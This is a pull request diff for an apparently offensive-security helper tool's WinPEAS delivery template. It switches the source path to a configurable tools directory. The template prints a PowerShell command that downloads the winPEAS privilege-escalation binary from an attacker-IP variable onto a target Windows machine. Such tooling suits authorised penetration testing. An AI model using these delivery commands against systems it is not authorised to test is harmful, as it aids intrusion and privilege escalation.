### PR TITLE
fix: changed WinPEAS template to use tools dir instead

### DIFF
--- a/src/profi/templates/scripts/deliver-windows-winPEAS.yaml
+++ b/src/profi/templates/scripts/deliver-windows-winPEAS.yaml
@@ -6,7 +6,7 @@ metadata:
   author: "Unknown"
 
 content: |
-  mkdir -p packstation/outbound; cp -n /usr/share/peass/winpeas/* packstation/outbound; \
+  mkdir -p packstation/outbound; cp -n <%=$(esh variables/tools_dir)%>/winpeas/* packstation/outbound; \
   echo '================================================================'; \
   echo '                      -----PowerShell-----                      '; \
   echo 'Deliver only (x64): iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/winPEASx64.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe'; \


### PR DESCRIPTION
Previous template was using the local WinPEAS installation from the Kali folder.
Was identified in https://github.com/pluggero/profi/pull/125